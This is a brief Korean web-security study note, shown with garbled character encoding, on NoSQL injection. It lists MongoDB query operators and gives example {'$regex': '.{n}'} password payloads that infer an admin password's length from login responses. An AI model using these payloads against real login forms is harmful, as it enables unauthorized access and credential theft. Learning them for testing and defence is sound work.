๐Ÿ”’์ •๋ณด๋ณด์•ˆ/์›น ๋ณด์•ˆ

์›น ํ•ดํ‚น - NoSQL Injection ์กฐ๊ฑด ํ‘œํ˜„์‹

Janger 2021. 12. 9. 00:27
728x90

https://book.hacktricks.xyz/pentesting-web/nosql-injection

 

NoSQL injection - HackTricks

Brute-force login usernames and passwords from POST login

book.hacktricks.xyz

 

 

[$ne] : ๊ฐ™์ง€ ์•Š์„ ๊ฒฝ์šฐ(not equals)

[$regex] : ์ •๊ทœํ‘œํ˜„์‹

[$eq] : ๊ฐ™๋‹ค(=)

[$lt] : ์ž‘๋‹ค(<)

[$gt] : ํฌ๋‹ค(>)

[$lte] : ์ž‘๊ฑฐ๋‚˜ ๊ฐ™๋‹ค(<)

[$gte] : ํฌ๊ฑฐ๋‚˜ ๊ฐ™๋‹ค(>)

 

 

$regex๋กœ ํŒจ์Šค์›Œ๋“œ ๊ธธ์ด ์•Œ์•„๋‚ด๊ธฐ

"password": {"$regex":".{1}"} => admin

"password": {"$regex":".{2}"} => admin

...

"password": {"$regex":".{5}"} => admin (5 ๊ธ€์ž!)

"password": {"$regex":".{6}"} => undefined

728x90